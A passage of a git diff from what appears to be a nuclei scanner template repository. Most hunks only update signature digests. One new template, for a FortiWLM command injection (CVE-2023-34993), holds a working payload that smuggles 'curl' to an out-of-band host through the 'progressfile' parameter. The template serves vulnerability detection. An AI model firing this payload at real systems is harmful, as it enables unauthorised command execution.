4b0a004830460221008ccfb624e1b6400d4cddc0b2993e08bd5354eee8148bfda6d926634ddcd0edba022100cee7cea01cf9c23bf06672b03172f0c7e56c039254ae3dd4952bd5ef2238581e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfe11a778c6bdc20a3e3c51aa378203f41b531b6cf2b922ffddca585df371d4e022100ea0109fec66b77cdff0258b416143e4a92a9b0da63dd600edb0836e302cc174e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 1c3693b74d..4e12ddae19 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220700ed173b11c2e20ecbee34d4daa10a6ab4fbb3d3d6de997b4f5d134a2ecf77c022100d10b6ad1e04329352ac7e9c8379d5158277e6544ee1cc5b3a8cd8f89e250f538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9067e909acc7a2d500f2c26948b4522fdc9edd4b54f73569d62173980ae5508022040a90e51a04e9bc63fdc75a8a8a3dafc7d45accc85ebcdde5cae853e953cdab2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 1736ea7cec..867bbb630c 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e5dc30305610b201f884f23892ce10ede72bf98badae9d48a2129ffb9d5b855b022100df0de73006f05e5e205b4f10cf4f9ec5e4cedf0efa16015c2c488551312287c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009479667c973f231f672de742d4d97331b4c21e19dbb0a788759c317ba27f8c39022048d0e0658080c3f33b833368dad4f9bf938432524fa1d99a3bc9bb30daf57e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 898539b60c..9edc4bae5e 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -50,4 +50,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 490a0046304402200494f8a672eeea7b79a4b8d4421ed85d8d7734c73ac44ca1833ab4c7d341db3c022051ed7f90feb1286159b2e884e556a7d106f85d506a96ceded318bf93c1fc4a0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f461d9a22d4192ae50d7184b7c62456f024994ec86af7ac106a6acf92d75e9a02205c9f5d1ee349fbfb52b415a8925b40bc8086234dba1a1db9810e2c19cbc23dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 8ee2cbb300..8eee0e5231 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4b0a00483046022100d254ae2cc6e10e2b7a0b760b7b8c435250cdd60e6285ed462163eaaff3c070c5022100b37484a234b018d3119aa9903ef2f1e70949016e4df1cd552ebf1e0e589dd1be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2ee0c48456364462d7c1a8ea7bb091882fa60e3f5feef0fbf0e95d002a1f9d502200ec877b901dcbe66ed9604657f506954e463a2e83c5da054a3d0a25a2872cea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 155f59aaa8..6d1d4d166c 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -50,4 +50,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4b0a00483046022100b95caf8751c886a1180f377e8b18b610def59fd896ea9cf0684e881d7a37c8360221008cc6ee2f369421b207a2d0a0dc05966c468709686caa184d2ef85d1f6843e98b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f737b834d8d2f63b18c8ba8cf13ec2d6d966422dde65c1cbe93267a6e3eb3e7e02206668e55a7520baf24cf028a0f98825d967c1ec5440bc46a3b838c8d15e22f6e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index 788551541e..b5bebab94f 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -51,4 +51,4 @@ http: - contains(header, "text/html") - contains(body_2, 'Admincenter') condition: and -# digest: 4a0a0047304502203f0e5c7e2296f6aea2a9359267fffbb617bc06062027be74804431cf36c9b42e022100c229e8902210ce477fc01fbf83262b7a62a47f1c36c5033fcf1218f3f34c8821:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008292d511617bd0c0a8bcafe1cfa684cc711d54ab9a4eb35f63670ed0da9bb7070221008b351cb79ef3863804a1be0bb6833d415171ff25050bffc03a68641202906cd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index ac65ad8df8..668506d369 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d7713c458b64f28d2f64e50c85f011d74f228fe8cc69c569cd734ef0ffb761b9022100fa49d384e32501ed9537fef58bcf289642cb0ba7f514d762fa62c2f092c7121e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b64fb96d0bdf7e75e75a35ec0199aa1a3b5ad75d08cb6c6005cdab98520d23e2022100edd40b93a955f7bda18c65178cbbb5d427b07936f1be261dae3217d6a0871932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 03d9c33f17..5b92ad6570 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022061c431fdf207f7ea4d36d8cc273540d96b24bad5eb6f740a6abc2f9d119d13af022100e258f9ef363ecef737199af9fed98977a2abf54592595103173537d46eafe938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d995b5c47a61e69483f37d5514da329e6e5264c597a3db33117f015a98ea951022074cb814111b69e59c9ca138398de1758fb2b9ddff8e946023fc973237475ec59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml new file mode 100644 index 0000000000..3016937624 --- /dev/null +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -0,0 +1,45 @@ +id: CVE-2023-34993 + +info: + name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability + author: dwisiswant0 + severity: critical + description: | + A improper neutralization of special elements used in an os command ('os + command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and + 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands + Successful exploitation of this vulnerability could allow an attacker to + bypass authentication and gain unauthorized access to the affected system. + remediation: | + For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6. + For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5. + reference: + - https://fortiguard.com/psirt/FG-IR-23-140 + - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/ + metadata: + max-request: 1 + vendor: fortinet + product: fortiwlm + shodan-query: http.title:"FortiWLM" + tags: cve,cve2023,fortinet,fortiwlm,rce,unauth + +variables: + progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log" + +http: + - method: GET + path: + - "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" +# digest: 490a0046304402205d0bf594e5e591c8131ea79f03e90148cd44bb6a34f98409151d12e3e02decdf02200769496d8dae7769c9ed8d8aff7f94757ad51ddb46d0c8212cba99fd3f6c225b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 51e833fa56..f3ed2f48c3 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a43750984d5d763f65a2df2de389cd06cab18ab6dbf608418371f871314c448d022100de675192cb4d280f967aae610de7a2013ef923581368105fe4bd4a505c6ab206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d54ca66a373a5bdcb687b5b8b95c728c3ce6b58452faa138205faece235ac65b02210088184db11f7365836e9398e8726d7171649424fa801671bb3b01055266eec5e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index a49c7b164e..76e5b32c83 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa6de53b06c1a63f89884c7cf83f5d77085e8a8908b665b5925493f9608471720220337120050453388f3ee107a5db08bb6dff1a53ea33ccb6d3701b3a7bcf3dad96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220243836b94a2d61545b25c455eded8de7de85ac65d3b6b9af8a8fcc77b63fd743022100f5505508a01612d3ac0944285448da37021c6c8b43040cc8e87ead6567966426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index 78970178b0..d5812e686c 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022044034db64ef9ef45582da4086dcedb3c1c01c7d4a01afd787675aca9b9bfbecd02210087ce9493983c01299d7789eac94578f95f3292f01007514664d06f2e1ab93d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c87539b230266de86c5cb08d7a6ad9aaaeb4263821230046e194e05e8a0174c4022100f43f59553b68b72f32bd7190982615fd429469fe92dedf5ac1147322a2b44bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index ca1d06e8df..0e918eae9a 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022017bc5f2b16e0ca0610e7a1318faa515395fec0ac8dcb61e17d98b28771072c4d022100c3169e48ab56a57dc13f66953f6b9d4af19b52edd021e3c2c67e3316cbeef0b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202166d86ce51fb834d2224a38c2fc782a361c00323225718ad53ac225a1fc99e5022100b50ae20578925fa33bf3bf21b84ca62ad1f608e065b119d67da180e3c888efb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index dfca2cfb41..28b2667599 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f44223496eb9379aad157575f1da8ffeee8621a72992f995700ce45365c9d99a02202a2fc1893bc5022dac041ccf3e0e5ba3e0c1d8c7ab2e55f47f54cffe4df8f2ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe79b6e44ab8020b7faefa67f3a3d4942a785bad4463a968f3dd2a6f86c3f762022100f7d484210f37cf4a1a39a45131261d1aebd56373323505b1eddfac6ce045f90d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 862740abc5..c6493bc628 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -102,4 +102,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body_4 -# digest: 4b0a00483046022100a965c5aa86724461be49dc6f22e5e276c37bf751025a1b6c1fb45a522cbe6459022100b172fe21a3323fc138e640a9c2aaff7526c48dc4ecebca40df1c3ab8bd2f305b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ad7b347a592e2187ab82ad8fcd08c9e9450340488818c2461f1b556f453438d022052153b577f0a31f4f323829b25293bd92882d19fd5ee60f7374293fec0f1dc93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 4cd25cf8fb..23a94dbbbc 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -52,4 +52,4 @@ http: - type: json json: - .data.content[].path -# digest: 4a0a00473045022100def4985dd7778df6a1d5c9f98f3ece4617c8a60957ff1f29881d2fed74708283022038d353ab6bc0b1ec74dcc29be3a3a4bc5aa804509f1d38aed6af4156ebd72d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ab9d58c827030307982f2317cf0ef5e0e46c5e54170976febd9ae98ad7c5e62022100c5d29929622fac47b5729e0314b96749a088e78fc9b1eb2ae10b87a7e649ae16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index e2e97210a2..d956cb2bee 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9e9dbc9d6af841a42dc7fdbbca155673aa9282b8b716fb83983d86705a8df69022100a64d8c367e01fbcef5e217d129f655145668ba601ac68915238bd18578a14b16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8826a6a2aea8b8fdf4bfc526ec4eaf6e1a0613d805ba05235b18095a7a5796b0220449dc6d5f9a0d9bba00cbcd3d271d7ea2cd057ea1993f5acadaeb5edc012f478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index af0fc824f7..4bdfc8b4ea 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -82,4 +82,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "successfully created")' condition: and -# digest: 4a0a0047304502206b97747100f99dcf7af6fa3d1a6a5113faadd98e0650c0ac84bfac389c445ef9022100fd0c72bacf4b9dac9f1d188e62ff87871d19017212646b6ac68be950c3b835b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e799953dae56e9b662fde6de93d347795acb3667514d9a5fa271eabdfcf4013d02203f0531f79fc6e1e1ef6223126edf2381436958e233b332c2f728230217c7cf48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 4183da3a89..383af58111 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100be44a94843df5136fcf9428b6ce72f5247c6aded87fcec98c841f8c30b35a955022040b09b45ae19432597735473984666ce5be6ac2d24f298f99545943c043cf9e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a917400368cfdba77d790147d84d75dde69c698ea1f50eb87e2e46ef3802e6702204a6951c6f20cf4e0722ad2424746f227dd1fb1172fe5f7e624c00010f826aa2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 989578aeb1..d9ffe9ebbf 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -43,4 +43,4 @@ http: - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")' - 'contains(body, "")' condition: and -# digest: 4a0a0047304502204ca2b5c72b73a659b9fb01556d411b3e15c8ad9d780b722d9497135cc52ac9cf0221008df8da5b8e34a5ca7709a088f341727facdfab632c45f1ce8299beb77d463f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd2b30d77bd7fdbf38132b03bf1799f609b6434de967ef4df2ad9a875f78a1a7022100b3979a2c39405f62a7af632bf637171fd653ed4121ee891ddabc6d19b422be6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index c20c884c33..79489bac76 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, "") && contains(body_2, "import_form_template")' - 'status_code_2 == 200' condition: and -# digest: 4a0a00473045022100f8764d2d78fd60f4d446f5ab1fc67f82a242bae3e88b7f6c456c272eaa55bd08022068e16d1ebe6a07d9e891a4a4d71b34af106e752ca034f729318bb7c5a62c0f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220353eff964c533a49e3c19d5bb0058b18616fc012d2fdba215438ed89028e46fe022100f8f7ba5442e1e6c4a9f638ce048f7fd25f8e3b8bf43e6f77c3b3226be5003f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 1488758f3c..2eed763b87 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -49,4 +49,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and -# digest: 4a0a0047304502205cbd4741c39b434b88ef3ead02c752251f95bf6dbe8e8059662e92b90897689c022100aa8aa8154750e2e1b81cb66889cde57d1d2d25176d58af0f8f59219999b364f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2618a3728707739f3a031285e196d3b43d5bf03d3f4e6e53e28d654b97d694602203d8fd37c306cee28bd1c86e457dbde123a4af70c48824d8539dca9d6e6106e1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index 5f4cab8cb5..64bd0a4275 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, ">w71ch") && contains(body, "mooDating")' condition: and -# digest: 490a00463044022011a50867d6d17e45367b9060aba96dc0721f8564916bb3d53d06ca872ff605b502205174a5930299746715e55901fba2937b756d6009949afd7136f46321e5d6e608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027cd912e53fe3d0f2326275dd4ccade28bab4684b50300171df9b865796e73be022100a4a0c5e64721b43ab72868d32738f431adf44fa42083842dc9faa71541da7677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index ea853443cb..f12d8cd284 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022069e4f76b7541117047d6b5fbff0638f7689de48eace2052246876bad80389e92022100c5a425f8712fccb62bb2ed4ba375b3970dbfe7f75dfc80d3dcea2506446c0e27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092efe2f7cbaa87951776951c53fc173d616cbec9006b475bef3a28d4e713c0a302204f45c907afe1173bcb87289b260f05e5301354aa04df9c0b878d45914e35b075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index c8f8c4fa4a..0b8ad635ce 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">r5c3m", "mooDating")' condition: and -# digest: 4a0a00473045022100b05a610127a2d346feb23f60c642e73e72d23bd0288ef86ba10f9e765c9023740220100ef20b84ff07b6cce6cb00f20dc243cfb50c20ba7a74ebc07adee6f0c64e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbb95798feea3cf7aaba17b4e5abd88edc10d3800e4bcb3e7f11fb62502fd79d02206cb3514a3aef06831a5a7df5e2ffdf89867957a0dee2da8461dd34c830010db4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index 92449544bd..a73a85af29 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">", "mooDating")' condition: and -# digest: 4a0a00473045022100f4f628fd2287a7ee0a031c832d8b5f365d3ffded6530c9354ec70ce9cf35b7b9022070912eb8d8fb2312e587dbc98552acc296b5812911f2bea64fd718bfb709c809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e52e37ba7cbb0809f204d6bf85295214994040f499549c02451dc287877adeb5022100e6f6a88c449847bf9aa171e91057daa40d93e1f86e2123e04355ff621d74b68e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 78ac1b4891..0480cddc9c 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, ">","mooDating")' condition: and -# digest: 4a0a00473045022100d22ded65b2c2e327a20181b59b079959a844d14ef479ff63f218dbc74443a69702206abd18eb60a2e75f1098a31f6a7fa2584611952a7f3a79dfc42d814e2958046d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210095ca1683def9b0c91047311e6f9ac37e0cead694dff6725f35ea1656e831b3ae02205ee54ee3b2a7ac6698d824c665300872a060654f713a6fa82658a6734360c28d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index f325d8cd20..4df0a4e64e 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -74,4 +74,4 @@ http: regex: - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="' internal: true -# digest: 4a0a0047304502205b3126c453ad24827df1eaf254ea4e3fbd04236bc8c8268724e73aa93ee875e8022100fb7295e372da90177d5a3aa29e62bfbf9f3f45a39bbb39157ab4b952ed79606a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9a7773d904e9fa5c973745a8ee5c0f73380b28f646d8f3ff079eafd3a063e7c022100f3fa44d5e64cf31c9b245337c65ffa6e69c59c68ba5b34ffc15408ed780def70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 6b332ec057..c2b4f687cf 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220389ff47d5afabade42c7f1b1ebe5535aa5d3926cdefa18dc27eb7a66c7702314022020b737b982b1ad919c7741d10f0124dc5ef9fcb35a5ceb7ff4a748b433beaf2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3246be44ceef6ea2e435be5a11aae0e8e6a5b0bff8ff778f8541446b1566252022100c08b1259680e594668aebd2ebdd3e2bc2a1937bc404b59c4bc2b4c3bbb0747c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index b7dd4d8d54..b624b4b962 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -60,4 +60,4 @@ http: part: header_3 status: - 200 -# digest: 4a0a00473045022100c834e2f1963706edf3cf0dd6ef33e5434d7759edb6960c50d8fdd829b7144c83022044124344f077774fd5ba3b5053dfb28e89ffb6fc60a9e0b6b52ef44fe415622d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f76db15bb398543e9501f63c4ad814bd902f8f8c51a8ee350506f79735e17ae02206fef9f11657871d39967978871c9fb85398198ed6f4078057df0ebbfdf85ea41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 813ac6ee75..da1a548cb8 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -44,4 +44,4 @@ http: - contains(to_lower(content_type), "image/png") - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex condition: and -# digest: 4a0a00473045022100f6a2b6b7e8aa15862f63d7db27872c57bd9aba19f3441e2e9df61dc3df6b4e0602202c63a079241bec55fe9f775dfe32184ef768dd4f627ba1a842c7ca1bd77f37a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e4d4a1e68563a0ade9ad94f1623d780a44134066c6c9cec0763cd4c3cd63f0f022100b34545c47beaf43bd77fd5894b890c154740d5b91d8aa85439c0f9c1d80f5ff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index b0338df7d1..4711e6a136 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048ccae40d0e308c91b7bf2a65af3acb8805302abc2da11451a56e025d969a4f70220289dbf0f4493ca3a0eecc81966b5beb4f5085b5530c1efdd71009f78f77df548:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2542c5b578aa1b6054c4391c618faf48d5a6721aa2a2c6f8f5282d057aaeb62022100f40e458db85ae7f25e9ceda5370d49473cb23b2dbd1db4b82625581ce539525a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index dc9290ef75..81eb0d53a8 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022066106fdff2f39d233a879770a44bf0af51976d8bb7b252d0ad825648873aafeb0220572b45153d8d42366194b8954545bb1a4dd2b8ef74d94db80d96d63dd8a54da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066fea1c991470ad12b0b6368cc977cb17842be9a515cfb209f347e80761a7fca02210099ca332958026e4c04ae258f60fead3e94e63aac0b964f658b9b0e0c795bce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index f05daa8902..af6be74e1c 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aa807e3bcac81e3aba7acb98c1e4353acb06c7be8581ac40249eec7da00308b60221008ec8d3e71fa4d0cbd80afc2ebfabbc7988d1afbcbfe7661d019710dda860ca9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 